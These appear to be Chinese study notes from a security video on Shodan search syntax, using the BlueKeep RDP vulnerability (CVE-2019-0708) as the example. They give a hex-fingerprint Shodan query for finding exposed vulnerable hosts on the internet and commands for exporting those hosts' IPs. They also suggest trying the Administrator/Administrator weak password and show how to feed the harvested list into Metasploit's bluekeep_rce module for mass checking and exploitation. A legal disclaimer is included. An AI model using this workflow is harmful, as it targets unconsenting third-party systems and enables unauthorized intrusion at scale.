声明
学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章。
笔记只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负
这节课旨在扩大自己在网络安全方面的知识面,了解网络安全领域的见闻,了解学习哪些知识对于我们渗透测试有帮助,避免盲目地学习降低效率。
前言
shodan的指令语法很多,不可能说每个参数都讲完,因为有的参数压根用不上。
今天把一些红队常用的参数讲完,以cve-2019-0708的一个漏洞为例
cve-2019-0708
漏洞介绍
通过利用远程桌面的3389端口,RDP协议进行攻击,从而导致机器蓝屏瘫痪。该漏洞的触发无需任何用户交互操作,这就意味着,存在漏洞的计算机只要联网,无需任何操作,就有可能遭遇黑客远程攻击,运行恶意代码等,极具破坏性!
漏洞原理
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
#十六进制字符串(类似于指纹的方式去找)
'"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
上面这串字符串就是cve-2019-0708的十六进制漏洞特征,但是有漏洞不代表能直接利用
用Windows远程连接 看主机是否存活,IP已打码
远程连接出现后,可以测试弱口令 Administrator &Administrator
如果无法连接也没事,我们可以使用metasploit去进行批量的漏洞利用,msfconsole,讲到那学到哪,不用着急,工具也俗称msf
将命令输出的IP信息,复制到一个新建文本,只有IP,不要带端口,命名为01.txt,将其复制到kali
msfconsole
#进入msf
search 01
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
#进入利用脚本
show options
set rhosts file:(拖入复制的文本,比如文本从物理机桌面粘贴到kali桌面,在kali桌面点击拖住,移动到这条命令里)
check(开始检测)
#显示出来,有*的为利用不成功
攻击不成功有几点说一下,首先 show options 看清我们的payload ,IP端口要填对,另外就是show targets 它支持Windows7,sever这种,得把targets设置正确
这样找漏洞会方便很多
今天讲两个参数一个parse一个download
download(下载)
shodan download -h(查看帮助文档)
shodan download 0001 --limit 100 '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
#下载有关cve-2019-0708漏洞的100条,'0001'仅为保存的文件名,可随意设置
#输入命令时,显示你在哪个目录,就去哪个目录去找"0001",输出格式为 '0001.json.gz'
如何打开 .json.gz这个输出文件呢,看下条参数
parse(可理解为解压)
shodan parse -h(查看帮助文档)
shodan parse --fields ip_str 0001.json.gz
#直接在终端打开
或
shodan parse --fields ip_str 0001.json.gz >0001.txt
#将'0001.json.gz'输出为'0001.txt'
这是一个批量刷漏洞的一个姿势
当然,也可以用 这条命令:shodan search vuln:cve-2019-0708 ,但是这需要更高级别的账号去使用,我们用这种方式照样绕过它去批漏洞
遵纪守法,从我做起